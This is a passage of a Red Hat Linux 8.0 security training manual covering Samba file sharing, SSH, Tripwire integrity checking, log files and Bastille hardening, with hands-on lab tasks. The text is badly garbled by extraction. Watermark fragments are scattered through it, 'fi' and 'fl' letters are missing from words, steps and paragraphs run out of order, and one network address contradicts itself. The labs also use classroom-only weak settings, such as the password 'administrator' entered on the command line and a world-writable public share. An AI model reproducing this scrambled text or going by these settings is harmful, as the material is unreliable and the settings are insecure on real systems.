smbclient //fuzzybunny/marketing -U johni
Your request will be sent to fuzzybunny and you will be prompted for a password before being allowed to proceed.
Support ACLs on printer and le shares. Engage in NetBIOS Browsing.
Be a Master Browser for a Windows network. Support RPC-based and LanMan printing.
or
DO NO
ru ct
Sambas Configuration Files
Conguring Samba
In
204
st
To explore these options, feel free to look at the default smb.conf le before you modify it. It has numerous sample congurations with explanations that will show many more of the options available to you.
Editing the les needed to congure the Samba server so that it will share directories with the rest of your network is relatively straightforward, at least for a basic implementation. The le you will be most concerned with is smb.conf, which (in a default install) should be located in the /etc/samba/ directory. In the task for conguring Samba, you will be using a very simple conguration, but there are many more options that are available for you to use. In broad terms, the smb.conf le is separated into two sections: The Global Settings section has settings that apply to the overall running of the server, such as the name of the workgroup and its description, IP restrictions, guest accounts, logging, encryption use, Browser control modes, WINS and DNS settings, and security modes. The Share Denitions section denes the properties of the individual shares that are congured for the server.
Even though the conguration we will be using in the upcoming task will not have too many parameters dened, we will still step through them here. Here is the conguration you will be working with:
DU
PL
IC
But even if Samba can perform any of these, or other, roles, it is still not a Windows serverthe very machine that was designed to do those tasks. So why would anyone replace a Windows machine, such as a le or print server, with a Linux machine running Samba? As usual, the bottom-line answer is often due to the bottom line. Licensing costs for Windows NT Server can rapidly add up, while Red Hat Linux with Samba support can legally be had completely free of charge, excluding the cost of your bandwidth to download and burn the CD images.
Ed
Act as a Windows NT Domain Controller.
AT
iti
Even though it is beyond the scope of this course, the Samba server can do far more than just act as a means for sharing les; the Samba server can also: Be a NetBIOS name server.
on
The rst part of the le contains the Global Settings, which dene the following: WorkgroupThis eld denes the name of the workgroup under which you want the server to appear. The default is MYGROUP, but to be part of the same workgroup that Windows uses by default, we will use workgroup. Server stringThis eld will display as text under the Comment eld in Network Neighborhood.
AT
or
DO NO
Hosts allowThis will restrict access to the hosts or networks you dene. Although not really important in the classroom, you should dene your network and your loopback address here. For instance, if you are in the 17.16.0. 0/16 network, to permit your peers and yourself to access the Samba share, your entry would look like this:
172.16. 127.
Ed
T DU PL IC
Local masterThis line states that the Samba server will not become the master browser in the network. If you want it to participate in the normal master browser elections, change the setting to yes (you should also dene an OS level if you want it to have a chance of winning). Name resolve orderThis line tells Samba to check its /etc/hosts le for name resolution. If no entry is found, then resort to a broadcast to resolve the IP.
In
Socket optionsThese options are simply for performance.
st
Encrypt passwords and smb passwd leThese entries tell Samba to use encrypted passwords (thats oversimplied for now; it deals with sending hashes for the challenge/response system), and where the 16-byte hash values are stored for Samba users (much in the way that the shadow le stores hashed passwords for normal users).
ru ct
SecurityThis sets the security mode touser level (which accepts or rejects requests based upon a user name and password. For share-level security, the client authenticates itself for each separate share.
E
Be aware that there is a period after the 16, a single space between that period and the 127, and a period after the 127.
iti
205
# global settings workgroup = workgroup server string = Samba Server hosts allow = 172.16.0. 172.17.0. 172.18.0. 127. security = user local master = no name resolve order = host bcast encrypt passwords = yes smb passwd file = /etc/samba/smbpasswd socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192 # share definition [public share] comment = public samba share path = /samba_share browseable = yes public = yes writable = yes
on
The second part of the le has the Share Denitions, which dene the following: [public share]Sets the name for the share. CommentSets the comment that clients browsing the network will see for the share. PathIndicates where the real shared directory can be found for the share. BrowseableDenes whether clients will be able to nd the share by browsing Network Neighborhood. PublicSetting to yes means that it is not a private share for restricted users. WritablePermission selection, denes that users are able to write to the share.
Running and Maintaining Samba
Ed
T DU
It should be obvious that before users can connect to the Samba server, there needs to be user accounts for the Samba server to authenticate users against. To create these accounts specic to Samba, use the smbpasswd -a command. The user account should already exist on the Linux system. This command species that the user name should be added to the local smbpasswd le, using the new password given in the command. For example, to add the account administrator_ bob with a password of administrator to the local /etc/samba/smbpasswd le, you would use this command:
smbpasswd -a administrator_bob administrator
or
DO NO
In
206
st
ru ct
/etc/rc.d/init.d/smb start
/etc/rc.d/init.d/smb restart
Once Samba is congured and running, any Windows client that is allowed to use Network Neighborhood (or My Network Places, as the case may be) will be able to nd the Samba server, as long as the share has been marked as browsable = yes.
Figure 3-23: The Samba server shows up in My Network Places.
PL
IC
Once changes have been made to the smb.conf le, you need to tell the machine to account for these changes and reapply the conguration. You can do this by restarting the Samba service. To stop, start, orin one commandstop and restart the Samba service, you can use any of these commands: /etc/rc.d/init.d/smb stop
AT
iti
on
Double-clicking the Samba server, like any other machine in the network, will make the computer try to authenticate the incoming request before continuing. After the browsing computer has authenticated, a list of shares is presented to the user.
Figure 3-24: The Samba share as seen by administrator_bob.
TASK 3D-3
Configuring the Samba Server
Ed
DU PL IC NO T
Note:Perform step 1 through step 22 only if you have been designated as the Linux user. 1.
ru ct
Setup: Students should work in pairs for this exercise. One student will use Windows 2000 Server and the other Red Hat Linux 8.0. If time permits, the task should be done twice with the Windows and Linux roles reversed, so that both students can perform the Linux install and be the Windows client.
or
DO
Objective: For this task, we will create a simple public share that Windows clients will be able to access on our Linux server.
AT
If NetBIOS has been disabled for any reason in Windows, it should be re-enabled for this task.
On the Linux machine, from the Red Hat Main Menu, choose System SettingsUsers And Groups to prepare to create a user account for the Windows user who will be connecting to the share.
3. 4. 5. 6. 7.
Set the User Name to administrator_bob. Set the Password to administrator, and conrm the typing of the password.
In
Click OK to add the new user. Close User Manager. Open the Nautilus File Manager to prepare to create the le that will be used for the public share. Under Location, change /root to /, and press Enter. In the open space displaying the directories under /, right-click and choose New Folder. Name the folder samba_share.
st
2.
Click the Add User button.
iti
on
8. 9.
Right-click the new folder and choose Properties. On the Permissions tab, change the permissions so that owner, group, and others all have read, write, and execute permissions. Observe how the text and numerical views change as you check or uncheck the boxes. This might help you better understand the relationship between the types of permissions displays. Click Close.
10. Navigate to and open the /etc/samba directory.
11. Right-click the smb.conf le and choose Copy File. Paste the copy into the same folder by deselecting the le and right-clicking in the open space of the folder and choosing Paste File. 12. Right-click the copy and choose Properties. Change the name of the le to smb.conf.bak. Although its not quite necessary to do it in this case, it is usually a very good idea to make a backup of a working conguration le before you make any changes to it. 13. After your backup has been made, right-click the smb.conf le and open it in Emacs.
If you like, you can use any other text editor, such as OpenOfce or jpico.
14. Take a quick look through the sample cong to become familiar with some of the things you can do with Samba, then select and delete all of the text in the le.
Ed
T DU
st
208
In
DO
ru ct
NO
# global settings workgroup = workgroup server string = Samba Server hosts allow = 172.16. 172.17. 172.18. 127. security = user local master = no name resolve order = host bcast encrypt passwords = yes smb passwd file = /etc/samba/smbpasswd socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192 # share definition [public share] comment = public samba share path = /samba_share browseable = yes public = yes writable = yes
or
PL
IC
AT
15. Enter the following lines:
iti
on
16. Save your changes and close the le. 17. To test your conguration changes for syntax errors, open a Terminal Window and enter testparm. Examine the results displayed, press Enter to view the service denitions, correct any errors (typos are usually to blame), and retest before you proceed. 18. In the Terminal Window, enter smbpasswd -a administrator_bob administrator to add the user you created earlier to the list of users who can access Samba shares with an encrypted password. If you see an error message, re-enter the command. 19. In the Nautilus File Manager, nd the /etc/services le, and verify that it contains this line: swat 901/tcp to provide SWAT functionality. If necessary, add the line and save the le. 20. Find the /etc/xinetd.conf le, and edit it to add the following line: swat stream tcp nowait,400 root /usr/sbin/swat swat, then save and close the le. 21. In the Terminal Window, enter /etc/rc.d/init.d/smb start to start your Samba server. You should see two starting responses.
If you are using OpenOfce, when you choose to save, you will see a pop-up asking if you want to save it in the OpenOfce.Org 1.0 text document format. Click No, then when you go to close OpenOfce.Org, you will be given another warning telling you that saving in external formats may have caused information loss. When you are asked if you still want to close, click Yes.
Ed
T DU PL IC
st
23. At the Windows 2000 Server machine, log on as administrator, and open My Network Places. 24. Verify that you can see the Samba Server in the workgroup. This share can also be reached like any other normal share in a Windows network by using normal UNCs (\\ServerName\public share). This would be even more valuable information if the share were marked as not browsable.
In
DO
Note: Perform the rest of this task only if you have been designated as the Windows user.
NO
22. Give your machine a few minutes to update the local network, then ask your partner to complete the rest of the task.
ru ct
or
AT
If your partners machine is unavailable, check the smb.conf le to ensure that the hosts allow line is accurate.
E
209
iti
on
If swat is not installed in the default location of /usr/bin, alter the line to match the location of your swat le.
25. Double-click the icon for the Linux machine, and log in using the credentials your partner entered earlier in the task. 26. Reboot and log in to Linux as root.
Final OS Hardening
System Startup/Shutdown Security
Hardening Startup and Shutdown Routines
or
DO NO
ru ct In
st
Figure 3-25: A Linux lilo.conf le.
DU
PL
IC
AT
The computers boot loader is the small le that allows the computer to load the operating system, and often presents the computer user with a small menu of OSs to load. In Linux, the boot loader is usually LILO (which stands for Linux Loader). LILO is congured at the end of the installation process, but it can be modied later for added security. Figure 3-25 shows an example LILO le that has not been altered since the install of the OS.
Ed
Up to this point, all the security issues addressed were ones that required the system to be up and running, and interacting with clients and other computers. There are things you can do to affect the overall security of the machine, even before the system is fully loaded and operational.
iti
In this topic, you will investigate several additional hardening methods, including securing the system startup and shutdown processes, logging, Tripwire, and Bastille.
on
Topic 3E
The primary item to add to the LILO le is the ability to add a password. An example syntax is simply password=L1L0_p@s5. The LILO le is not encrypted, and the password will be stored in cleartext in the le. This means that you will need to secure the le so that users, other than the root account, cannot read it. It is also suggested that you implement a password on the computers BIOS, and if the option exists, disable the use of the oppy disk drive. The opposite end of the spectrum is the process of shutting down the system. Linux has a specic sequence of events that happens during the shutdown process. The general process of bringing down a Linux system by using the shutdown command is detailed in the following four steps: 1. 2. 3. 4. Noties other processes and user accounts that the shutdown is imminent. Shuts down the other processes that are still running. Noties root of the services that are shut down. Reboots the system (if specied).
Shutting down the system properlynot just hitting the power switchand letting the system complete the shutdown process is important. A system that is not shut down properly might not unmount partitions, leading to system corruption.
Ed
DU PL IC T
The shutdown command can be run only by the root account. The le is located in /sbin/shutdown, and has two common switches. Using the -r option reboots the system, and using the -h option halts the system. (Halt means that the system will power down.)
Removing Services
One of the fundamental steps in hardening any OS is to remove, or disable, services and unwanted aspects of the OS that are not going to be used, without affecting the OSs functionality. From the Terminal Window, you can kill the services one at a time, as you wish.
ru ct
or
NO DO
AT
Removing Services
Remember, to nd Process IDs for running services, use the ps command.
Consider changing the permissions on the shutdown command. If the majority of the users of the system were connecting remotely, you would likely want that command to be available only to the root account. If they are local users, you might decide to have the command available to everyone.
In
Another great tool for disabling services is the Service Conguration tool. This tool allows for the quick visual check of running services, and enables you to use check boxes to start and stop services, without having to resort to using the command syntax. Figure 3-26 shows the Service Conguration tool.
st
You can use the kill utility to end a service. When executed, the kill utility sends a signal to the service, which is identied by the PID. If no signal is specied in the syntax of the command, a TERM (terminate) signal is sent. The initial syntax is simply kill <PID>. If you need to restart the service after it has been killed (if you have made changes to it, for example), just add the -HUP switch, for a command syntax of kill -HUP <PID>.
E
211
iti
on
Ed
T DU
Figure 3-26: The Service Conguration tool in Red Hat Linux.
st
2. 3.
Scroll through the list, and examine the processes that you can stop, such as apmd. Stop the apmd service, click Save, and quit the Service Conguration tool.
212
In
DO
ru ct
TASK 3E-1
1.
Setup: You are logged in to Linux as root.
In a Terminal Window, enter serviceconf to start the Service Conguration tool.
NO
Stopping Unneeded Services
PL
A great feature of this tool, as you can see from the image, is that there is a short description of each service. For example, the highlighted service could probably be turned off on a desktop computer. This is helpful for the services you are not sure about. If you are still unsure, even after reading the short description, you must do more research before changing your system. Turning off the wrong service can have drastic consequences, so you should attempt to do so only if you are certain of the results.
or
IC
AT
iti
on
Linux Run Levels

In the Service Conguration tool, you might have noticed a Runlevel indicator. The run levels of Linux are the basic modes of operation. An analogy for Windows users is running in Safe Mode, because that is a different mode of operation for the OS. Linux has six different run levels: 0: Halt the System 1: Single-user Mode 2: Multi-user Mode (without NFS) 3: Multi-user Mode 5: Multi-user Mode, with a Graphical Login 6: Reboot the System
For most systems, the default is to use a run level of 5. If you want to have the system load into a text-mode login, then use run level 3. Levels 1 and 2 are rarely used.
A program called init is responsible for the starting and stopping processes based on run level. You can manually enter a runlevel command. For example, to shut down and halt the system you can use the telinit 0 command; to shut down and reboot the system, you can use telinit 6.
Ed
DU PL IC T
SSH
ru ct
The replacement for telnet is SSH, or Secure Shell. SSH creates a secure connection between the client and the server, where the client initiates all communication. There are several benets to the security of the network from using SSH, including: 1. Authentication is encrypted, so the user name and password are never transmitted in cleartext.
or
DO NO
Even though you use telnet often in this class, and perhaps in the office, the behavior of telnet is not secure enough for organizations that require high levels of security. The reason that telnet is not considered to be secure enough is that the authentication of telnet is carried out in cleartext. Anyone sniffing the segment can learn the user name and password for telnet authentication.
AT
secure shell: A completely encrypted shell connection between two machines protected by a super long pass-phrase.
2. 3.
After a session is established, the client veries that the server is still the same host that the client started the session with.
In
In Red Hat Linux 8.0, a version of SSH called OpenSSH is included. This includes the OpenSSH Server (openssh-server) and the OpenSSH Client (opensshclient) packages. OpenSSH also requires the OpenSSL package for the cryptographic component, which is included. The OpenSSH daemon uses the conguration le /etc/ssh/sshd_cong. To congure an OpenSSH Server, you can enable the OpenSSH service by using the /sbin/service sshd start command.
st
Data transferred between client and server is encrypted using 128-bit encryption.
E
213
iti
on
The server will generate RSA keys for use with SSH. The RSA keys are found in the /etc/ssh directory. Keys in the le that end with a .pub extension are public keys, and should be readable by everyone. Keys in the le that end with a _key extension are private keys, and should only be readable by root. Once the command nishes running, you are ready to accept clients using SSH.
TASK 3E-2
Configuring an SSH Server
1. 2. 3. 4. 5.
In the Terminal Window, enter /sbin/service sshd start to start the SSH Server.
In the Terminal Window, navigate to /etc/ssh. Check the permissions on the key les. Remember, you can use the ls -l command to do this.
Ed
T DU
If necessary, acknowledge that you want to generate key pairs. The keys might have been generated during the install of the OS.
Every user on the system will have a unique key pair.
st
5.
In
When you answer Yes, an entry is made into the known_hosts le in your /home/ssh directory. You are then prompted for your user name and password. Enter your credentials to complete the connection to the SSH server.
6.
214
DO
ru ct
2. 3. 4.
The client side is straightforward as well. You must have openssh-clients and openssh installed on the client side, in comparison to openssh-server and openssh on the server side. If the required packages are installed, you are ready to walk through the process of SSH on the client side. 1. Log in as your normal user account. To generate the private and public key pair that you will use, use the /usr/bin/ssh-keygen command. The pair will be located in your /home/ssh directory. Enter the command to access the remote SSH server. If the SSH server is SSH1.example.com, your command would be ssh SSH1.example.com. If this is the rst time you have connected to this machine, you will be prompted that the authenticity of the host cant be established. Click Yes to continue. The prompt is due to your machine not having information on the remote SSH server.
NO
PL
IC
Configuring and Using the SSH Client
or
AT
Close all windows. The SSH server is now running
iti
on
TASK 3E-3
Configuring an SSH Client
1. 2. 3.
In a Terminal Window, enter /usr/bin/ssh-keygen -t rsa to generate a new key pair.
Accept the default location for storing the key pair. The default will be in your user accounts home directory. When you are prompted for a passphrase, enter your rst name. This passphrase must be at least ve characters, so if you have a short rst name, add some letters or numbers to it. Conrm the passphrase when you are prompted to do so. In the Terminal Window, navigate to your /root/.ssh/ directory.
4. 5. 6.
Verify the key pair and the permissions. Again, use the ls -l command to do this. Enter ssh a.b.c.d, where a.b.c.d is your partners IP address, to connect to your partners computer. Because it is your rst connection to the remote SSH server, you are prompted to continue the connection. Answer Yes to continue the connection.
Ed
PL IC T DU
7. 8. 9.
When prompted, enter your credentials, just as you would if you were using telnet.
or
DO NO
AT
Use your Linux credentials, not the passphrase.
10. If necessary, navigate to the known_hosts le in your /home/user.ssh/ directory. Enter cat known_hosts to view the entry for your partners computer. 11. Close all windows.
In
st
ru ct
Navigate as you would in a telnet session to verify connectivity, then close the session by using the exit command.
E
215
iti
on
Setup: You are logged on to Red Hat 8 as root. Students should work in pairs for this exercise.
Tripwire
Tripwire
The Tripwire Modes
Tripwire has several modes that the user should be familiar with:
intrusion: Any set of actions that attempts to compromise the integrity, condentiality, or availability of a resource.
Integrity Checking Mode is usually run after the database has been created. This mode searches the system for differences when compared to the baseline database. This mode will generate a detailed report of any violations found in accordance to the Tripwire policy. Database Update Mode is used to change your baseline database. For instance, if you monitor your /etc/shadow le and you have created accounts for two new employees, your integrity check will always report the violation, even though you needed those two changes. You could run in Database Update Mode to alter your database to include the two new changes.
or
DO NO
ru ct
The Tripwire Policy
In
st
The Tripwire Policy le, twpol.txt, is normally found in the /etc/tripwire directory and is a plaintext document that is congured by default to check most of the les in the Red Hat install.
DU
PL
It should be noted though that Tripwire is not a true integrity checker in the purest sense of the word, because Tripwire does not check some properties such as the inode information.
Policy Update Mode is used to update changes to Tripwires policy le. Test Mode is used to test the ability of Tripwires email notication system. When used, this will send a test message to the account specied.
IC
AT
Ed
The Database Initialization Mode is usually one of the rst modes used. It will create the snapshot of your system that Tripwire will use for integrity checking.
iti
tripwire: A software tool for security. Basically, it works with a database that maintains information about the byte count of les. If the byte count has changed, it will identify it to the system security manager.
Tripwire does this by creating a one-way hash value for a directory or le. This hash is stored, and when subsequent checks are made of that directory or le, Tripwire again hashes the object and compares the resulting hash against the stored value. If the hashes do not match up, a ag is raised, and various actions can then be taken, depending on the conguration of the policy.
on
Tripwire is the most commonly used le-integrity checker for Linux. It is often used as part of a companys intrusion detection system (IDS) because it can be used to maintain a snapshot taken of your system while in a known-good state; which it will compare against the running system at regular intervals to determine if any of the protected les have been altered or otherwise tampered with.
Figure 3-27: The editable twpol.txt le.
or
DO NO
!/proc tells Tripwire to ignore the entire /proc directory.
DU
/etc/shadow -> +ug (emailto=admin@some_company.net) tells Tripwire to email an alert if there is a change noticed in the shadow le.
ru ct
/var/log/maillog -> $(Growing) tells Tripwire that the le is expected to get larger (as most logs do), but still alert if the le gets smaller.
PL
alert: A formatted message describing a circumstance relevant to network security. Alerts are often derived from critical audit events.
After the policy le has been congured, it is time to start things rolling. From the /etc/tripwire directory, run the command ./twinstall.sh to start the process of creating key pairs for securing les, creating the twpol le, and creating the backup of the twpol le.
In
st
IC
This le can be altered like any text document to congure the policy so that only the les you specify will be checked. In addition to dening what les should be checked, there are several options that will determine how Tripwire will react while checking those les. This is a small list of some of the more important options that can be used: /etc/shadow -> $(IgnoreNone) tells Tripwire that it should report any and all changes made to the shadow le.
Ed
AT
E
217
iti
on
Figure 3-28: Tripwire setup and passphrase request.
Ed
T DU PL IC
The Tripwire Database
st
218
In
DO
ru ct
The Tripwire database will be generated using the conguration parameters that were dened earlier. To start the database-creation process, run the tripwire --init command. Depending on the number and size of the les that are being checked, the database generation can take a signicant amount of time. It is for this reason that when we change the policy that we will be checking only a single le! To view the specics of the database, run the twprint --print-dbfile command.
The Tripwire Integrity Check
NO
Once the database has been created, its generally a good idea to make sure that the notication system is operating properly by using the test parameter. To do this, enter the tripwire --test --email root@localhost command into a Terminal Window.
or
AT
iti
on
Figure 3-29: The Tripwire mail test.
To actually run an integrity check, use the tripwire --check command.
There are a few switches that you might want to use if you are automating this with a script. The -s switch will not display the report to standard output, usually because you will not be logged in when the script will be set to run. The -M switch will tell it to email the report if you have placed an emailto= line in your policy. To read the results of a report, use the twprint --print-report -r /var/lib/tripwire/report/XXXXX.twr command, where XXXXX.twr is the name of one of the report les located in the /var/lib/tripwire/report/ directory.
Ed
T DU PL IC
Best Practices
st
2. 3.
In
#!/bin/bash # Daily Tripwire Check /usr/sbin/tripwire --check -M
Place the new le in the /etc/cron.daily/ directory. Make the le executable by running the chmod -v u+x tripwire command.
DO
To automate the running of Tripwire, you can run it as a cron job. By default, Red Hat has an entry in the /etc/cron.daily/ directory to have Tripwire run daily. If it is not there, you can create a simple job to run, similar to the following: 1. Create a new text le named tripwire, and enter the following lines.
NO
To change your database, update the policy le (twpol.txt) as needed, and then run the tripwire -m p /etc/tripwire/twpol.txt command.
ru ct
It is generally a good idea not to keep the database in its default location (/var/ lib/tripwire/hostname.twd), because anyone who gains unauthorized access to the system might be able to update the database so that it will not report any of the les that were altered. Often, the database is placed onto read-only media, such as a CD-ROM. In such a case, the integrity check command would have to include the -d option to tell Tripwire where the database is located; for example: tripwire -check -d /mnt/cdrom/dbfile.twd
or
AT
E
219
iti
on
TASK 3E-4
Starting Tripwire
Setup: You are logged on to Red Hat 8 as root. 1. 2. 3. 4.
Like with the smb.conf le, you can delete all of the existing text because you have a backup of the original conguration le.
Start Nautilus File Manager, and navigate to /etc/tripwire. Make a backup copy of the twpol.txt le.
Open the twpol.txt le in a text editor such as Emacs. Edit the twpol.txt le to read as follows:
# @@section FS SIG_HI =100; (
rulename = "Passwd Check", severity = $(SIG_HI), emailto = root@localhost
or
DO NO
Save and close the le.
ru ct
6. 7. 8.
5.
In a Terminal Window, navigate to the /etc/tripwire directory, and enter ./twinstall.sh to run the Tripwire install.
When you are asked for a site keyle passphrase, enter and conrm twpass as the site passphrase.
When you are prompted for the site passphrase, enter twpass to continue with the install. You will be notied that the conguration le was written to the /etc/tripwire directory as tw.cfg, and that a cleartext version, called twcfg.txt, was written for your inspection. After inspecting twcfg.txt, you should delete it for security purposes.
In
st
When you are prompted to provide a local keyle passphrase, enter and conrm localpass as the local passphrase.
DU
PL
IC
AT
In the interest of time, you will be checking and tracking only the shadow password le for changes. In a production install, you would obviously be tracking changes far more thoroughly.
) { /etc/shadow -> $(IgnoreNone); }
Ed
iti
on
9.
When you are prompted for your site passphrase so that the new policy can be signed, enter twpass to complete the setup routine.
Ed
10. In the Terminal Window, enter tripwire --init to start Tripwire.
or
DO NO
12. Observe the message that states the database was successfully generated. 13. In the Terminal Window, enter tripwire --test --email root@localhost to test the email capabilities of Tripwire. You will see a message telling you that an email is being sent.
ru ct
14. To see if the email was delivered correctly, switch to Nautilus File Manager, and navigate to the /var/spool/mail/ directory.
In
st
T
DU
PL
11. When you are prompted for the local keyle passphrase, enter localpass to provide the local passphrase.
IC
AT
E
221
iti
on
15. Right-click the root le, and choose Open In New Window to open the Tripwire email. If you have not deleted this le recently, you may have several messages from the system alreadyscroll down to the bottom, and the test email from Tripwire should be there.
Ed or
DO NO
ru ct
In
st
DU
17. Switch back to the Terminal Window, and enter tripwire --check -M to perform an integrity check and have Tripwire email you the report.
PL
16. Navigate to the email folder (/var/spool/mail/), and delete the root le. This will make it easier for you to nd future email messages.
IC
AT
iti
on
18. Return to the /var/spool/mail/ directory, and verify that you have a new root le.
19. Rename the root le to rootrst to rename the Tripwire email report.
Ed
DU PL IC T
21. From the Red Hat Main Menu, choose System SettingsUsers And Groups to open the Users And Groups tool.
22. Select any user that you created during an earlier exercise, change the users password, and exit the tool.
ru ct
or
DO NO
AT
If, for some reason, you have removed all accounts except the root account, you can also add a new user account to accomplish the same goal.
20. Open the rootrst le by right-clicking it and choosing Open In New Window. This is the report you just generated, which is also visible in the Terminal Window if you scroll up a little. Keep the window openwe will compare this report to the next report we generate.
23. Switch to the Terminal Window, and run the tripwire --check -M command again. 24. Return to the /var/spool/mail/ directory, and open the new root le. Compare it to the rootrst le, looking for differences. Pay particular attention to the Object Detail sections to view the differences. In the Tripwire reports, Access Time will always show up, but the Modify and Change times should not differ unless there has been a change to the le (as would be the case if someone created a new account or modied a password). 25. Close all windows.
In
st
E
223
iti
on
Logging
Logging is a necessary evil in all operating systems. In Linux, you are presented with the ability to log enormous amounts of data. You can log the system, applications, and protocols. The output of most of the logs are text les in the /var/log directory. Figure 3-30 shows a partial listing of the /var/log directory on Red Hat Linux 8.0.
Logging
Ed or ru ct
The lastlog Log File
Figure 3-30: The /var/log le.
st
224
In
DO
The /var/log/lastlog le tracks the last login of user accounts into the system. The full log will provide extensive information, so if you are just curious about a single user account, use the command syntax: lastlog --u <username>. This is a temporary logone that you should back up daily if you want to use this data over time.
NO
There are far too many log les to cover in this lesson, so you will examine several of the critical log les as they relate to security. The rst two logs are called lastlog and last.
DU
PL
IC
AT
iti
on
Ed
Figure 3-31: The /var/log/lastlog le.
The last Log File
or
DO NO
ru ct
In
st
T
DU
The last le tracks the last login data, similar to the previous example, but adds another level of information. This le can report on the users, their IP addresses (or hostnames), the date and time of the last connection, and the duration of the last session. Stored in /var/log/wtmp, this log can be viewed by using the last command in the Terminal Window. If you are looking for information on a specic user account, use the syntax: last <username>. Using the -a option will display hostname information, and the -d option will display hostname and IP address information.
PL
IC
AT
E
225
iti
on
Ed
T DU
Figure 3-32: The last log output with the -a and the -d options.
st
6.
Close all windows.
226
In
DO
ru ct
1. 2. 3. 4. 5.
Setup: You are logged on to Red Hat 8 as root.
In Nautilus File Manager, navigate to the /var/log directory.
Observe the logs that are stored in this directory.
Enter lastlog to view the lastlog le. In another Terminal Window, enter last -a -d root to check the last log for root.
NO
In a Terminal Window, navigate to the /var/log directory.
PL
Logging Recent Login Activity
IC
TASK 3E-5
or
AT
iti
on
The xferlog Log File

If your system is running FTP, you will most likely want to track the le transfers taking place. The xfer log is the one you will investigate for these details. Usually found in the /usr/adm directory, the log contains server entries, each composed of a single line. You can read this output in the Terminal Window by simply viewing /var/log/xferlog (you may end up using the more option). The elds that this log can track are extensive, and include: The date of the transfer. The time of the transfer. The duration of the transfer. The client hostname and IP address. The size of the le transferred. The le name of the le transferred. The transfer type (ASCII or binary). The direction of the transfer (incoming or outgoing). The authentication method. The access method (anonymous, guest, or user account).
or
DO NO
error_logLogging access attempts, both successes and failures.
ru ct
201A successful POST command has completed. 300Client requested data that has moved. 404The requested document was not found.
The error_log will track data such as the date and time of the connection, the type of error report, the reason for the error, the service, and the action taken (if any).
The secure Log File

When you were conguring services for xinetd and for TCP wrappers, there was an option in the conguration le of the service for log_on_failure and log_on_ success. You can view entries from these options, as well as SSH connection status in the /var/log/secure le.
In
st
The access_log will track the clients IP address, the time and date of access, the command or request the client made, and the status code. The status codes are listings such as: 200Transfer completed without error.
DU
PL
More information might be logged depending on how httpd.conf is congured on the Apache server.
Just as you will want to track your logs for an FTP server, if you are running a Web server, such as Apache, you will want to have solid logging of the Web connections. The Apache server process generally has two logs, found in /var/log/ httpd. The two logs are: access_logLogging clients who contacted the Web server, when, how, and what did the client do while connected.
IC
AT
E
227
Web Server Log Files
Ed
iti
on
Using the Log Viewer

You might become comfortable reading the logs directly from their sources. However, in Red Hat, there is a utility that is designed to help with reading and managing the log les. This utility, called the Log Viewer, can be found under the Red Hat Main Menu by choosing System ToolsSystem Logs, or in a Terminal Window by using the redhat --logviewer command. The logviewer program is able to display only those log les that it knows exist. The conguration le that stores the available logs is found at /etc/syscong/redhatlogviewer. The Log Viewer is shown in Figure 3-33.
Ed or ru ct st
TASK 3E-6
1. 2. 3.
Using the Log Viewer

Setup: You are logged on to Red Hat 8 as root. From the Red Hat Main Menu, choose System ToolsSystem Logs to open the Log Viewer. View the Security Log, noting the records of access. View the System Log, noting the records of access.
In
DO
NO
The Red Hat Log Viewer is a dynamic program, meaning that it keeps updating the information seen on-screen to remain current. The default refresh rate is 30 seconds. The default can be changed in the viewer (by altering the Preferences) or directly in the syscong le, where the available logs are stored. You can also force an immediate refresh by using the FileRefresh Now command, or by pressing Ctrl+R.
DU
Figure 3-33: The logs presented in the Red Hat Log Viewer.
PL
IC
AT
iti
on
4.
Another handy log to view is the one that denes the RPM packages installed. Check the RPM Packages list to see the Open SSH components that are installed. Once you have viewed all the information you want, close the window.
5.
Securing Log Files
Although reading the log les directly can provide you the information you are seeking, there is a risk of leaving the les on the computer itself. If an attacker does compromise the server, an initial target will be to wipe out any log les that can trace the attackers activities.
One option to combat this is to use syslog. Syslog is the logging subsystem in Linux (and UNIX) that controls the logging function. A benet of syslog is that it is possible to have logs forwarded to another system in the network. The primary conguration le for syslog is /etc/syslog.conf.
Bastille
Bastilles Abilities
or
DO NO
Creating login banners.
ru ct
Restricting resource usage.
Disabling IP-based authentication protocols for anti-spoong protection.
Finding and updating RPMs by using the RedHat errata Web site (www.redhat.com/support/errata). Restricting access to many common administration utilities.
DU
spoong: Pretending to be someone else. The deliberate inducement of a user or a resource to take an incorrect action. Attempt to gain access to an AIS by pretending to be an authorized user. Impersonating, masquerading, and mimicking are forms of spoong.
Disabling system shutdown via the Ctr+Alt+Delete key combination. Protecting the LILO with a password.
Running an IPChains script to automate much of the conguration to make the machine a rewall. Conguring NAT settings (as part of IPChains). Limiting console login rights. Conguring remote logging. Removing unneeded daemons. Hardening Apache (not always as predictable as you might expect).
In
Setting password aging parameters.
st
PL
Bastille has the ability to help automate many security-minded functions on a system, including: Disabling the compiler.
IC
AT
Bastille is an Open Source program that can help you automate many of the processes for hardening a Linux machine. It can help ease an administrators job by making several taskslike implementing IPChains, enabling or disabling services, and closing unused portsquick and simple by asking the user a long series of mostly yes or no type questions.
Ed
iti
on
Bastille
compromise: An intrusion into a computer system where unauthorized disclosure, modication, or destruction of sensitive information may have occurred.
229
Installing and Using Bastille

To install Bastille, you will need the RPM for Bastille, as well as the pwlib and perl-TK RPMs. The RPMs should be installed in that same order, thenfrom a Terminal Window, issue the command bastille to start the Bastille conguration routine. From there, follow the prompts and answer all the questions before continuing on to the next section. The left side of the screen lists the section of the cong you are dealing with (the Module). The top right lists the question you are presently dealing with. The center right has a brief description of, or the purpose of, the current module. The bottom right is where you answer the yes or no question.
Ed or ru ct
Figure 3-34: Bastille Q&A.
st
230
In
DO
For some of the questions, you can opt to enter things like warning banners. When it is time to enter the text for your message or to enter a password (for any question that cant be answered yes or no), just type the text into the bottom-right window labeled Answer.
NO
DU
PL
IC
AT
iti
on
Undoing Configuration Changes

The best way to make sure that you do not need to undo any changes is tolike the old carpenters adagemeasure twice, cut once. By this, we mean that you should make a change only if you understand the repercussions of the choices you are making. However, this isnt a perfect world, and sometimes, changes need to be made. For this reason, there are a few possible ways to undo the changes made to a system. Of course, they arent 100 percent, so always try to measure twice before cutting! To undo conguration changes, you can try the following: Rerun Bastille, and make different choices to reverse the previous answers. To do this, navigate to the Bastille directory and use the ./InteractiveBastille.pl command. There is also a perl script that was made to try to undo changes; accurately enough, it is named undo.pl, and is located in the Bastille directory.
or
NO DO
Installing and Exploring Bastille

1. 2.
ru ct
Setup: You are logged on to Red Hat 8 as root.
Create the directory /bastille where you will store the Bastille les.
